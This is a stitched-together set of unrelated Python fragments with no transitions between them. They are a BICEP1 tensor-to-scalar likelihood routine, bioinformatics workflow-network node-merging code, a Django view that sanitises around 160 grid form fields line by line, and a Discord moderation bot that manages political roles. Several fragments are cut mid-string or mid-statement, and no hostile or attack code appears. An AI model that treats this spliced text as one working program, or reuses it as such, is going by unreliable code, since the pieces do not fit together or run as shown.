X = calc_vecp(l,C_l_hat,C_fl,C_l)
for lp in range(0,9):
#print(l, lp, r)
Xp = calc_vecp(lp,C_l_hat,C_fl,C_l)
M_inv_pp = M_inv[l,lp,:,:]
# calculate loglikelihood (Eq 7)
thislogL = (-0.5)*np.dot(X,np.dot(M_inv_pp,Xp))
logL = logL + thislogL
if np.isnan(logL):
logL = -1e20
logL = np.real(logL)
return logL
#####################################################################
# Utility function to save the likelihood vs r in a text file
def saveLikelihoodToText(rlist, logLike, field, exp='bicep1'):
if exp == 'bicep1':
print("### Saving Likelihood to file: B1_logLike.txt...")
f = open("B1_logLike.txt", "w")
f.write('# BICEP1 likelihood for r \n')
f.write('# Based on data from: Barkats et al, Degree Scale CMB Polarization Measurements from Three Years of BICEP1 Data \n')
f.write('# Available at http://bicep.rc.fas.harvard.edu/bicep1_3yr/ \n')
f.write('# This text file contains the tabulated likelihood for the tensor-to-scalar ratio, r, derived from the BICEP1 %s spectrum. \n'%field)
f.write('# Calculated via the "Hamimeche-Lewis likelihood" method described in Section 9.1 of Barkats et al. \n')
f.write('# This file is generated from a standalone python module: b1_r_wrapper.py \n')
f.write('# This likelihood curve corresponds to the blue curve from the left-hand panel of Figure
This
# will happen if one node is an ancestor of the other.
if n2 in ancestors.get(n1, []) or n1 in ancestors.get(n2, []):
continue
network = network.merge_nodes(
[n1, n2], nodeid2parents=nodeid2parents)
duplicates = _fix_node_id_pairs_after_merge(duplicates, n1, n2)
ancestors = _fix_node_id_dict_after_merge(ancestors, n1, n2)
nodeid2parents = _fix_node_id_dict_after_merge(
nodeid2parents, n1, n2)
changed = True
if not changed:
break
return network
def find_duplicate_data(self, network):
# Return list of (node_id1, node_id2) for DataNode objects
# that are duplicated. If no duplicates found, return an
# empty list.
# Make a list of all pairs of DataNode objects.
data_node_ids = [
node_id for (node_id, node) in enumerate(network.nodes)
if isinstance(node, DataNode)]
duplicates = []
for (i, j) in _iter_upper_diag(len(data_node_ids)):
node_id1, node_id2 = data_node_ids[i], data_node_ids[j]
node_1, node_2 = network.nodes[node_id1], network.nodes[node_id2]
if node_1.datatype.name != node_2.datatype.name:
continue
if node_1 == node_2:
duplicates.append((node_id1, node_id2))
return duplicates
class _OptimizeMergeData1:
# Sometimes the inference can lead to two nodes that share the
# same parents and the same children, and almost the same
# attributes. For example:
# Node1 Node2
# preprocess="unknown" preprocess=<everything else>
#
# If this happens, merge them to simplify the network.
def __init__(self):
pass
def optimize(self, network, custom_attributes):
import copy
network = copy.deepcopy(network)
while True:
similar = self._find_similar_nodes(network, custom_attributes)
if not similar:
break
# Merge the similar nodes.
while similar:
n1, n2 = similar.pop()
network = self._merge_nodes(network, n1, n2)
similar = _fix_node_id_pairs_after_merge(similar, n1, n2)
return network
def _find_similar_nodes(self, network, custom_attributes):
# Return a list of (node_id1, node_id2). Can be empty.
nodeid2parents = _make_parents_dict(network)
data_node_ids = [
node_id for (node_id, node) in enumerate(network.nodes)
if isinstance(node, DataNode)]
# Optimization: The same calls are made to _fc_to_output_ids,
# which takes up a lot of the compute time. Cache these
# calls.
fc_cache = {}
similar = []
for i, node_id1 in enumerate(data_node_ids):
for node_id2 in data_node_ids[i+1:]:
if self._are_nodes_similar(
network, node_id1, node_id2, custom_attributes,
nodeid2parents, fc_cache):
similar.append((node_id1, node_id2))
return similar
def _are_nodes_similar(
self, network, node_id1, node_id2, custom_attributes,
nodeid2parents, fc_cache):
node_1 = network.nodes[node_id1]
node_2 = network.nodes[node_id2]
# The data type must be the same.
if node_1.datatype.name != node_2.datatype.name:
return False
# They must share the same children.
c1 = network.transitions.get(node_id1, [])
c2 = network.transitions.get(node_id2, [])
if len(c1) != len(c2):
return False
if sorted(c1) != sorted(c2):
return False
# They might not share the same parents.
# align_bowtie1 -> SamFolder.aligner (bowtie1)
# align_bowtie2 -> SamFolder.aligner (bowtie2)
# Merge to:
# align_bowtie1 -> SamFolder.aligner (bowtie1, bowtie2)
# align_bowtie2 ->
## They must share the same parents.
##p1 = nodeid2parents.get(node_id1, [])
##p2 = nodeid2parents.get(node_id2, [])
##if len(p1) != len(p2):
## return False
##if sorted(p1) != sorted(p2):
## return False
# They must share all but 1 attribute.
x, x, diff_attrs = _score_same_data(node_1, node_2)
if len(diff_attrs) != 1:
return False
# After merging, these data nodes must be able to generate all
# the (grand)children that the unmerged data could generate.
module_ids = c1
paths = [] # list of (in_data_ids, module_id, out_data_id)
for module_id in module_ids:
if module_id not in fc_cache:
x = _fc_to_output_ids(
network, module_id, custom_attributes,
nodeid2parents=nodeid2parents)
fc_cache[module_id] = x
paths.extend(fc_cache[module_id])
# Make sure the input data includes node_id1 or node_id2.
paths = [x for x in paths if node_id1 in x[0] or node_id2 in x[0]]
# Make sure the input data does not include both node_id1 and node_id2.
paths = [x for x in paths
if not (node_id1 in x[0] and node_id2 in x[0])]
# The combined data node must be able to generate all these
# out data nodes.
merged_data = _merge_data_nodes(node_1, node_2)
for x in paths:
in_data_ids, module_id, out_data_id = x
in_datas = [network.nodes[x] for x in in_data_ids]
for i in range(len(in_data_ids)):
if in_data_ids[i] in [node_id1, node_id2]:
in_datas[i] = merged_data
break
module = network.nodes[module_id]
out_data = network.nodes[out_data_id]
if not _is_valid_inputs(
module, in_datas, out_data, custom_attributes):
return False
return True
def _merge_nodes(self, network, node_id1, node_id2):
# Delete the one with the higher node_id (node_id2).
if node_id1 > node_id2:
node_id1, node_id2 = node_id2, node_id1
# Merge the attributes of the nodes.
n1 = network.nodes[node_id1]
n2 = network.nodes[node_id2]
network.nodes[node_id1] = _merge_data_nodes(n1, n2)
# Everything that pointed to node_id2 now goes to node_id1.
for node_id, next_ids in network.transitions.iteritems():
if node_id2 in next_ids and node_id1 not in next_ids:
next_ids.append(node_id1)
# They share the same children already. No need to add.
return network.delete_node(node_id2)
class _OptimizeMergeData2:
# is_compressed -> Fastq.trimmed=no -> uncompress
# is_compressed -> Fastq.trimmed=yes -> uncompress
# Sometimes will be root nodes (no parents).
#
# Actually, don't use this. It can make the inferencing harder.
# e.g.
# Fastq.trimmed (no, yes) -> is_compressed -> Fastq.trimmed (no)
# Hard to reason whether Fastq.trimmed (no, yes) is a valid
# antecedent of Fastq.trimmed (no).
def __init__(self):
pass
def optimize(self, network, custom_attributes):
import copy
network = copy.deepcopy(network)
while True:
similar = self._find_similar_nodes(network)
if not similar:
break
# Merge the similar nodes.
while similar:
n1, n2 = similar.pop()
network = self._merge_nodes(network, n1, n2)
similar = _fix_node_id_pairs_after_merge(similar, n1, n2)
return network
def _find_similar_nodes(self, network):
# Return a list of (node_id1, node_id2). Can be empty.
nodeid2parents = _make_parents_dict(network)
data_node_ids = [
node_id for (node_id, node) in enumerate(network.nodes)
if isinstance(node, DataNode)]
similar = []
for i, node_id1 in enumerate(data_node_ids):
for node_id2 in data_node_ids[i+1:]:
if self._are_nodes_similar(
network, node_id1, node_id2, nodeid2parents):
similar.append((node_id1, node_id2))
return similar
def _are_nodes_similar(self, network, node_id1, node_id2,
nodeid2parents):
node_1 = network.nodes[node_id1]
node_2 = network.nodes[node_id2]
# The data type must be the same.
if node_1.datatype.name != node_2.datatype.name:
return False
# They must share the same children.
c1 = network.transitions.get(node_id1, [])
c2 = network.transitions.get(node_id2, [])
if len(c1) != len(c2):
return False
if sorted(c1) != sorted(c2):
return False
# They must share the same parents.
p1 = nodeid2parents.get(node_id1, [])
p2 = nodeid2parents.get(node_id2, [])
if len(p1) != len(p2):
return False
if sorted(p1) != sorted(p2):
return False
# They must share all but 1 attribute.
x, x, diff_attrs = _score_same_data(node_1, node_2)
if len(diff_attrs) != 1:
return False
return True
def _merge_nodes(self, network, node_id1, node_id2):
# Delete the one with the higher node_id (node_id2).
if node_id1 > node_id2:
node_id1, node_id2 = node_id2, node_id1
# Merge the attributes of the nodes.
n1 = network.nodes[node_id1]
n2 = network.nodes[node_id2]
network.nodes[node_id1] = _merge_data_nodes(n1, n2)
# They share the same parents and children, so nothing needs
# to be rewired.
return network.delete_node(node_id2)
def _find_paths_h(network, node_id, custom_attributes, nodeid2parents):
#import itertools
assert node_id < len(network.nodes)
node = network.nodes[node_id]
prev_ids = nodeid2parents.get(node_id)
if not prev_ids:
assert isinstance(node, DataNode)
yield (node_id,)
return
if isinstance(node, DataNode):
combos = []
for prev_id in prev_ids:
combos.append((prev_id,))
elif isinstance(node, ModuleNode):
combos = _bc_to_input_ids(
network, node_id, custom_attributes, nodeid2parents=nodeid2parents)
for combo in combos:
# Make a list of the possible paths for each branch.
branch2paths = []
for prev_id in combo: # prev_id is node_id for one branch
paths = []
for x in _find_paths_h(
network, prev_id, custom_attributes, nodeid2parents):
x = tuple(x)
paths.append(x)
assert paths
branch2paths.append(paths)
# Merge the paths for each branch.
for x in _product_and_chain(branch2paths, None):
x = x + (node_id,)
yield x
def find_paths(network, custom_attributes, max_paths=None):
# Iterate over all possible paths from the start nodes to the end
# nodes. Each path is a list of the node_ids.
assert network.nodes, "empty network"
nodeid2parents = _make_parents_dict(network)
for i, x in enumerate(
_find_paths_h(network, 0, custom_attributes, nodeid2parents)):
yield x
if max_paths is not None and i >= max_paths:
break
def _find_paths_by_datatypes_h(
network, node_id, custom_attributes, datatype_names,
nodeid2parents, depth):
# Yield tuples of:
# path list of node_ids in this path.
# used_ids list of node_ids for nodes from datatype_names
# missing_ids list of node_ids not in datatype_names
import itertools
assert node_id < len(network.nodes), "%s %d" % (
repr(node_id), len(network.nodes))
node = network.nodes[node_id]
prev_ids = _get_parents_of(network, node_id)
if isinstance(node, DataNode):
# If this node is one of these datatypes, then this can be an input.
if node.datatype.name in datatype_names:
yield [node_id], [node_id], []
elif not prev_ids:
# If this is a start node, then this is a missing input.
yield [node_id], [], [node_id]
combos = []
for prev_id | |
' ').replace('\n', ' ').replace('\r', ' ')
r1c8 = request.POST.get('r1c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c9 = request.POST.get('r1c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c10 = request.POST.get('r1c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c11 = request.POST.get('r1c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c12 = request.POST.get('r1c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c13 = request.POST.get('r1c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c1 = request.POST.get('r2c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c2 = request.POST.get('r2c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c3 = request.POST.get('r2c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c4 = request.POST.get('r2c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c5 = request.POST.get('r2c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c6 = request.POST.get('r2c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c7 = request.POST.get('r2c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c8 = request.POST.get('r2c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c9 = request.POST.get('r2c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c10 = request.POST.get('r2c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c11 = request.POST.get('r2c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c12 = request.POST.get('r2c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c13 = request.POST.get('r2c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c1 = request.POST.get('r3c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c2 = request.POST.get('r3c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c3 = request.POST.get('r3c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c4 = request.POST.get('r3c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c5 = request.POST.get('r3c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c6 = request.POST.get('r3c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c7 = request.POST.get('r3c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c8 = request.POST.get('r3c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c9 = request.POST.get('r3c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c10 = request.POST.get('r3c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c11 = request.POST.get('r3c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c12 = request.POST.get('r3c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c13 = request.POST.get('r3c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c1 = request.POST.get('r4c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c2 = request.POST.get('r4c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c3 = request.POST.get('r4c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c4 = request.POST.get('r4c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c5 = request.POST.get('r4c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c6 = request.POST.get('r4c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c7 = request.POST.get('r4c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c8 = request.POST.get('r4c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c9 = request.POST.get('r4c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c10 = request.POST.get('r4c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c11 = request.POST.get('r4c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c12 = request.POST.get('r4c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c13 = request.POST.get('r4c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c1 = request.POST.get('r5c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c2 = request.POST.get('r5c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c3 = request.POST.get('r5c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c4 = request.POST.get('r5c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c5 = request.POST.get('r5c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c6 = request.POST.get('r5c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c7 = request.POST.get('r5c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c8 = request.POST.get('r5c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c9 = request.POST.get('r5c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c10 = request.POST.get('r5c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c11 = request.POST.get('r5c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c12 = request.POST.get('r5c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c13 = request.POST.get('r5c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c1 = request.POST.get('r6c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c2 = request.POST.get('r6c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c3 = request.POST.get('r6c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c4 = request.POST.get('r6c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c5 = request.POST.get('r6c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c6 = request.POST.get('r6c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c7 = request.POST.get('r6c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c8 = request.POST.get('r6c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c9 = request.POST.get('r6c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c10 = request.POST.get('r6c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c11 = request.POST.get('r6c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c12 = request.POST.get('r6c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c13 = request.POST.get('r6c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c1 = request.POST.get('r7c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c2 = request.POST.get('r7c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c3 = request.POST.get('r7c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c4 = request.POST.get('r7c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c5 = request.POST.get('r7c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c6 = request.POST.get('r7c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c7 = request.POST.get('r7c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c8 = request.POST.get('r7c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c9 = request.POST.get('r7c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c10 = request.POST.get('r7c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c11 = request.POST.get('r7c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c12 = request.POST.get('r7c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c13 = request.POST.get('r7c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c1 = request.POST.get('r8c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c2 = request.POST.get('r8c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c3 = request.POST.get('r8c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c4 = request.POST.get('r8c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c5 = request.POST.get('r8c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c6 = request.POST.get('r8c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c7 = request.POST.get('r8c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c8 = request.POST.get('r8c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c9 = request.POST.get('r8c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c10 = request.POST.get('r8c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c11 = request.POST.get('r8c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c12 = request.POST.get('r8c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c13 = request.POST.get('r8c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c1 = request.POST.get('r9c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c2 = request.POST.get('r9c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c3 = request.POST.get('r9c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c4 = request.POST.get('r9c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c5 = request.POST.get('r9c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c6 = request.POST.get('r9c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c7 = request.POST.get('r9c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c8 = request.POST.get('r9c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c9 = request.POST.get('r9c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c10 = request.POST.get('r9c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c11 = request.POST.get('r9c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c12 = request.POST.get('r9c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c13 = request.POST.get('r9c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c1 = request.POST.get('r10c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c2 = request.POST.get('r10c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c3 = request.POST.get('r10c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c4 = request.POST.get('r10c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c5 = request.POST.get('r10c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c6 = request.POST.get('r10c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c7 = request.POST.get('r10c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c8 = request.POST.get('r10c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c9 = request.POST.get('r10c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c10 = request.POST.get('r10c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c11 = request.POST.get('r10c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c12 = request.POST.get('r10c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c13 = request.POST.get('r10c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c1 = request.POST.get('r11c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c2 = request.POST.get('r11c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c3 = request.POST.get('r11c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c4 = request.POST.get('r11c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c5 = request.POST.get('r11c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c6 = request.POST.get('r11c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c7 = request.POST.get('r11c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c8 = request.POST.get('r11c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c9 = request.POST.get('r11c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c10 = request.POST.get('r11c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c11 = request.POST.get('r11c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c12 = request.POST.get('r11c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r11c13 = request.POST.get('r11c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c1 = request.POST.get('r12c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c2 = request.POST.get('r12c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c3 = request.POST.get('r12c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c4 = request.POST.get('r12c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c5 = request.POST.get('r12c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c6 = request.POST.get('r12c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c7 = request.POST.get('r12c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c8 = request.POST.get('r12c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c9 = request.POST.get('r12c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c10 = request.POST.get('r12c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c11 = request.POST.get('r12c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c12 = request.POST.get('r12c12').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r12c13 = request.POST.get('r12c13').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c1 = request.POST.get('r13c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c2 = request.POST.get('r13c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c3 = request.POST.get('r13c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c4 = request.POST.get('r13c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c5 = request.POST.get('r13c5').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c6 = request.POST.get('r13c6').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c7 = request.POST.get('r13c7').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c8 = request.POST.get('r13c8').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c9 = request.POST.get('r13c9').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c10 = request.POST.get('r13c10').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r13c11 = request.POST.get('r13c11').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
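# ---------------------------------------------------------------------------
# A minimal sketch (not from the original view) of the same sanitization done
# in a loop: the helper name `_clean` and the assumption that the grid spans
# rows 1-13 and columns 1-13 are illustrative only.
def _clean(value):
    # Replace tab, newline and carriage-return characters with spaces,
    # defaulting a missing field to an empty string.
    return (value or '').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')

cells = {
    'r%dc%d' % (row, col): _clean(request.POST.get('r%dc%d' % (row, col), ''))
    for row in range(1, 14)
    for col in range(1, 14)
}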
try:
os.remove(filePath + '.busy')
except:
pass
await bot.delete_message(message)
return
if message.content.lower().startswith('.iam'):
if message.content.lower().startswith('.iamz') and is_zig(message):
zigBot = discord.utils.get(message.server.roles, id = botRole)
if not zigBot in message.author.roles:
await bot.add_roles(message.author, zigBot)
await bot.delete_message(message)
else:
await bot.remove_roles(message.author, zigBot)
await bot.delete_message(message)
return
elif message.content.lower().startswith('.iamz'):
await bot.send_message(message.channel, message.author.mention + ' You\'re not Zig.')
return
if message.content.lower().startswith('.iam epic') and is_cheeti(message):
zigBot = discord.utils.get(message.server.roles, id = botRole)
if not zigBot in message.author.roles:
msg = await bot.send_message(message.channel,'You\'re epic!')
await asyncio.sleep(timeout)
await bot.delete_message(msg)
await bot.delete_message(message)
else:
msg = await bot.send_message(message.channel,'You\'re epic!')
await asyncio.sleep(timeout)
await bot.delete_message(msg)
await bot.delete_message(message)
return
elif message.content.lower().startswith('.iam epic'):
await bot.send_message(message.channel, message.author.mention + ' You\'re not epic.')
return
Snow1 = discord.utils.get(message.server.roles, id = talkRole)
Snow2 = discord.utils.get(message.server.roles, id = joinRole)
# Checks for single role or if user removed all roles
await asyncio.sleep(1)
if message.content.lower().startswith('.iamn') and discord.utils.get(message.author.roles, id = busyRole) is None:
await asyncio.sleep(1)
if not is_political(message):
# User removed role, revert
msg = await bot.send_message(message.channel, 'You aren\'t allowed to chat without an ideology. Please choose a role from #roles or `.lsar`')
await bot.add_roles(message.author, Snow2)
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow1)
await asyncio.sleep(7)
await bot.delete_message(msg)
await bot.delete_message(message)
# Checks for initial role to remove undecided
elif discord.utils.get(message.author.roles, id = talkRole) is None and discord.utils.get(message.author.roles, id = joinRole) is not None and is_political(message):
await bot.add_roles(message.author, Snow1)
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow2)
# If role doesn't exist
elif not is_political(message):
if discord.utils.get(message.author.roles, id = busyRole) is None:
msg = await bot.send_message(message.channel, 'Please choose a political role from #roles or `.lsar`')
else:
msg = await bot.send_message(message.channel, 'Your status is still set to busy.\n Please `.iamn busy` to get your roles back.')
await asyncio.sleep(7)
await bot.delete_message(msg)
await bot.delete_message(message)
# Checks for meme roles to shitpost
message.content = message.content.lower()
for x in range(len(memeRoles)):
if message.content.startswith(memeRoles[x-1]) and not is_serious(message):
filePath = curDir + '/logs/db/' + message.author.id
shit = discord.utils.get(message.server.roles, id = shetRole)
Snow1 = discord.utils.get(message.server.roles, id = talkRole)
Snow2 = discord.utils.get(message.server.roles, id = joinRole)
channel = discord.Object(id=shetChan)
await bot.add_roles(message.author, shit)
await bot.send_message(message.channel, '**' + message.author.name + '** was shitposted pending manual approval.')
msg = await bot.send_message(channel, message.author.mention + ', this role is commonly used by memers and raiders. Please contact admin/mod to regain access.')
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow1)
await asyncio.sleep(1)
await bot.remove_roles(message.author, Snow2)
await asyncio.sleep(120)
await bot.delete_message(msg)
p = open(filePath + '.punish', 'w+')
p.close()
############################
############################
# If no on_message command invoked, check bot commands
else:
# https://discordpy.readthedocs.io/en/latest/faq.html#why-does-on-message-make-my-commands-stop-working
await bot.process_commands(message)
############################
############################
@bot.event
async def on_member_update(before, after):
no = discord.Object(id=ignoreServ)
# Ignore events originating from the ignored server
if int(before.server.id) == int(no.id):
return
if str(before.nick) != str(after.nick):
embed=discord.Embed(description=before.mention + " **nickname changed**", color=0x117ea6)
embed.add_field(name="Before", value=before.nick, inline=False)
embed.add_field(name="After", value=after.nick, inline=False)
pfp = get_avatar(before)
embed.set_author(name=before, icon_url=pfp)
embed.set_footer(text="ID: " + before.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
elif before.roles != after.roles:
if len(before.roles) > len(after.roles):
